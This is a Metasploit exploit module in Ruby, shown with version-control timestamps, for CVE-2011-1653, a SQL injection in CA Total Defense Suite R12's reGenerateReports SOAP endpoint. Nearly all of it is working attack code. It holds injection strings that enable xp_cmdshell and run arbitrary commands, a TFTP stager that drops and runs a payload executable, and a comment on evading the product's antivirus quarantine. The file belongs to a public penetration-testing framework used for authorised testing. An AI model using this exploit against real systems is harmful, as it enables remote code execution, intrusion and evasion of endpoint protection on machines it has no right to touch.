2011-10-02 15:53:44 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-10-02 15:53:44 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2011-10-15 22:58:20 +00:00
|
|
|
Rank = ExcellentRanking
|
2011-10-02 15:53:44 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::CmdStagerTFTP
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',
|
|
|
|
'Description' => %q{
|
2011-10-15 22:58:20 +00:00
|
|
|
This module exploits a SQL injection flaw in CA Total Defense Suite R12.
|
2011-10-02 15:53:44 +00:00
|
|
|
When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an
|
|
|
|
attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql
|
2011-10-17 03:49:49 +00:00
|
|
|
statements into the ReportIDs element.
|
2011-10-02 15:53:44 +00:00
|
|
|
|
|
|
|
},
|
|
|
|
'Author' => [ 'MC' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-134' ],
|
2011-10-02 17:03:23 +00:00
|
|
|
[ 'OSVDB', '74968'],
|
2011-10-02 15:53:44 +00:00
|
|
|
[ 'CVE', '2011-1653' ],
|
|
|
|
],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2011-10-17 03:49:49 +00:00
|
|
|
[ 'Windows Universal',
|
|
|
|
{
|
2011-10-02 15:53:44 +00:00
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win'
|
2011-10-17 03:49:49 +00:00
|
|
|
}
|
2011-10-02 15:53:44 +00:00
|
|
|
]
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'DisclosureDate' => 'Apr 13 2011',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(34443),
|
|
|
|
OptBool.new('SSL', [ true, 'Use SSL', true ]),
|
|
|
|
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def windows_stager
|
|
|
|
|
|
|
|
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-10-02 15:53:44 +00:00
|
|
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
|
|
|
execute_cmdstager({ :temp => '.'})
|
|
|
|
@payload_exe = payload_exe
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-10-02 15:53:44 +00:00
|
|
|
print_status("Attempting to execute the payload...")
|
|
|
|
execute_command(@payload_exe)
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-10-02 15:53:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def execute_command(cmd, opts = {})
|
|
|
|
|
2011-10-15 22:58:20 +00:00
|
|
|
# NOTE: This module was tested against the MS SQL Server 2005 Express bundled with
|
|
|
|
# CA Total Defense Suite R12. CA's Total Defense Suite real-time protection
|
|
|
|
# will quarantine the default framework executable payload. Choosing an alternate
|
|
|
|
# exe template will bypass the quarantine.
|
|
|
|
|
2011-10-02 15:53:44 +00:00
|
|
|
inject = [
|
|
|
|
"'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",
|
|
|
|
"'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",
|
|
|
|
"'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",
|
|
|
|
]
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-10-02 15:53:44 +00:00
|
|
|
inject.each do |sqli|
|
|
|
|
|
|
|
|
soap = %Q|<?xml version="1.0" encoding="utf-8"?>
|
|
|
|
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
|
|
|
|
<soap12:Body>
|
|
|
|
<reGenerateReports xmlns="http://tempuri.org/">
|
|
|
|
<EnterpriseID>msf</EnterpriseID>
|
|
|
|
<ReportIDs>#{sqli}</ReportIDs>
|
|
|
|
<UserID>187</UserID>
|
|
|
|
</reGenerateReports>
|
|
|
|
</soap12:Body>
|
|
|
|
</soap12:Envelope>
|
|
|
|
|
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => '/UNCWS/Management.asmx',
|
|
|
|
'method' => 'POST',
|
|
|
|
'version' => '1.0',
|
|
|
|
'ctype' => 'application/soap+xml; charset=utf-8',
|
|
|
|
'data' => soap,
|
|
|
|
}, 5)
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-10-02 15:53:44 +00:00
|
|
|
if ( res and res.body =~ /SUCCESS/ )
|
|
|
|
#print_good("Executing command...")
|
|
|
|
else
|
2012-06-19 17:59:15 +00:00
|
|
|
fail_with(Exploit::Failure::Unknown, 'Something went wrong.')
|
2011-10-02 15:53:44 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
if not datastore['CMD'].empty?
|
|
|
|
print_status("Executing command '#{datastore['CMD']}'")
|
|
|
|
execute_command(datastore['CMD'])
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
case target['Platform']
|
|
|
|
when 'win'
|
|
|
|
windows_stager
|
|
|
|
else
|
2012-06-19 17:59:15 +00:00
|
|
|
fail_with(Exploit::Failure::Unknown, 'Target not supported.')
|
2011-10-02 15:53:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
handler
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
|
|
|
__END__
|
|
|
|
POST /UNCWS/Management.asmx HTTP/1.1
|
|
|
|
Host: 192.168.31.129
|
|
|
|
Content-Type: application/soap+xml; charset=utf-8
|
|
|
|
Content-Length: length
|
|
|
|
|
|
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
|
|
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
|
|
|
|
<soap12:Body>
|
|
|
|
<reGenerateReports xmlns="http://tempuri.org/">
|
|
|
|
<EnterpriseID>string</EnterpriseID>
|
|
|
|
<ReportIDs>string</ReportIDs> <--boom!!
|
|
|
|
<UserID>long</UserID>
|
|
|
|
</reGenerateReports>
|
|
|
|
</soap12:Body>
|
|
|
|
</soap12:Envelope>
|